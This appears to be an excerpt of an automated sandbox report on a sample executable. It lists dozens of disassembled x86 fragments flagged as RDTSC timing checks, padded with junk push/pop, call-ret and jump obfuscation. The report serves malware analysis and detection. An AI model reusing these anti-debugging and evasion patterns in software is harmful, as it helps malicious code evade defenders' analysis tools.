              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8DE second address: A8E951 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDE8CE8B4D3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FDE8CE8B4C8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F62h] 0x0000002e mov di, ax 0x00000031 push 00000000h 0x00000033 mov edi, 062440A7h 0x00000038 push 00000000h 0x0000003a jnc 00007FDE8CE8B4CCh 0x00000040 xchg eax, esi 0x00000041 jmp 00007FDE8CE8B4D6h 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F876 second address: A8F87B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EABB second address: A8EABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F87B second address: A8F8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FDE8C51D4D8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub ebx, 62742ADEh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c mov di, bx 0x0000002f jl 00007FDE8C51D4D9h 0x00000035 xchg eax, esi 0x00000036 je 00007FDE8C51D4E2h 0x0000003c jnc 00007FDE8C51D4DCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EB56 second address: A8EB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9371B second address: A937D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDE8C51D4D8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FDE8C51D4D8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov ebx, edi 0x00000044 sub edi, dword ptr [ebp+122D28CCh] 0x0000004a push 00000000h 0x0000004c mov di, 18ECh 0x00000050 call 00007FDE8C51D4E7h 0x00000055 add ebx, dword ptr [ebp+122D2C6Bh] 0x0000005b pop ebx 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push edi 0x0000005f jmp 00007FDE8C51D4DFh 0x00000064 pop edi 0x00000065 jmp 00007FDE8C51D4DCh 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A946B5 second address: A946BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A946BC second address: A94756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8C51D4D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jmp 00007FDE8C51D4E8h 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FDE8C51D4D8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FDE8C51D4DCh 0x0000004f push 00000000h 0x00000051 or dword ptr [ebp+122D226Ch], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d pop edi 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94756 second address: A94760 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A957B1 second address: A957C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FDE8C51D4D6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9DD3B second address: A9DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D47E second address: A9D4D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4EFh 0x00000008 pushad 0x00000009 js 00007FDE8C51D4D6h 0x0000000f jmp 00007FDE8C51D4E5h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDE8C51D4E2h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D4D2 second address: A9D4D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D66D second address: A9D69F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8C51D4E8h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D69F second address: A9D6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF00 second address: A9FF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA155D second address: AA1561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1561 second address: AA1575 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDE8C51D4D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1575 second address: AA1584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1584 second address: AA1592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1592 second address: AA1596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1596 second address: AA15B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9390B second address: A93910 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A959B2 second address: A959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6981 second address: AA699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FDE8CE8B4C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FDE8CE8B4C8h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A72 second address: AA6A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6B5E second address: AA6B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4D1h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6B81 second address: AA6B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6B90 second address: AA6B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6B9F second address: AA6BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6BA3 second address: AA6BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8CE8B4CBh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6BBA second address: AA6BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6BBF second address: AA6BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6C84 second address: AA6C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6C92 second address: 8CEC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007FDE8CE8B4C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 38407B17h 0x00000015 pushad 0x00000016 sbb eax, 17023EB2h 0x0000001c push edx 0x0000001d push edx 0x0000001e pop eax 0x0000001f pop edi 0x00000020 popad 0x00000021 push dword ptr [ebp+122D021Dh] 0x00000027 jmp 00007FDE8CE8B4D1h 0x0000002c call dword ptr [ebp+122D1DD7h] 0x00000032 pushad 0x00000033 jnp 00007FDE8CE8B4C7h 0x00000039 xor eax, eax 0x0000003b pushad 0x0000003c xor dword ptr [ebp+122D1CC9h], ecx 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 jne 00007FDE8CE8B4D4h 0x0000004d mov dword ptr [ebp+122D2BBBh], eax 0x00000053 clc 0x00000054 mov esi, 0000003Ch 0x00000059 mov dword ptr [ebp+122D1D82h], esi 0x0000005f mov dword ptr [ebp+122D1CC9h], esi 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 xor dword ptr [ebp+122D1D82h], edi 0x0000006f lodsw 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1D82h], edx 0x0000007c mov dword ptr [ebp+122D1CC9h], eax 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 jmp 00007FDE8CE8B4D4h 0x0000008b push eax 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB5E8 second address: AAB5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42C07 second address: A42C1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42C1C second address: A42C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8C51D4E1h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA36E second address: AAA38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop ebx 0x0000000b jns 00007FDE8CE8B4CCh 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FDE8CE8B4CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA38F second address: AAA399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA399 second address: AAA3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA3B0 second address: AAA3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA935 second address: AAA93F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE7F second address: AAAE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE86 second address: AAAE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE93 second address: AAAE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE9F second address: AAAEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAEA5 second address: AAAEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAEAA second address: AAAEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAEB0 second address: AAAEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB15E second address: AAB16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB16E second address: AAB178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8C51D4D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB178 second address: AAB1B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4F5h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB316 second address: AAB32A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8C51D4D6h 0x0000000e ja 00007FDE8C51D4D6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF708 second address: AAF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF70E second address: AAF712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF712 second address: AAF725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF725 second address: AAF74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FDE8C51D4EFh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF74A second address: AAF769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D5h 0x00000009 je 00007FDE8CE8B4C6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF8EC second address: AAF91F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDE8C51D4E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDE8C51D4E3h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFA7C second address: AAFA82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFA82 second address: AAFAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DDh 0x0000000b push edi 0x0000000c jmp 00007FDE8C51D4DCh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDE8C51D4E2h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0158 second address: AB0161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0161 second address: AB0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0569 second address: AB056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB056D second address: AB0573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0573 second address: AB0579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0579 second address: AB059D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDE8C51D4DCh 0x00000008 js 00007FDE8C51D4D6h 0x0000000e pop esi 0x0000000f jl 00007FDE8C51D4E2h 0x00000015 jg 00007FDE8C51D4D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0729 second address: AB0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0746 second address: AB0751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FDE8C51D4D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8F73 second address: AB8FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FDE8CE8B4C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jbe 00007FDE8CE8B4E5h 0x00000015 jmp 00007FDE8CE8B4CFh 0x0000001a jmp 00007FDE8CE8B4D0h 0x0000001f pushad 0x00000020 push eax 0x00000021 jmp 00007FDE8CE8B4CFh 0x00000026 jnl 00007FDE8CE8B4C6h 0x0000002c pop eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7757A second address: A775A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+1245066Fh] 0x00000012 lea eax, dword ptr [ebp+1247C2FEh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A775A1 second address: A775A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7764F second address: A77653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77BF8 second address: A77C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77C10 second address: A77C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77D13 second address: A77D5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007FDE8CE8B4C6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FDE8CE8B4CCh 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 jo 00007FDE8CE8B4D2h 0x00000029 jne 00007FDE8CE8B4CCh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77D5E second address: A77D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77D69 second address: A77D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77E20 second address: A77E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77E26 second address: A77E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8CE8B4D8h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007FDE8CE8B4CCh 0x00000013 jo 00007FDE8CE8B4CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
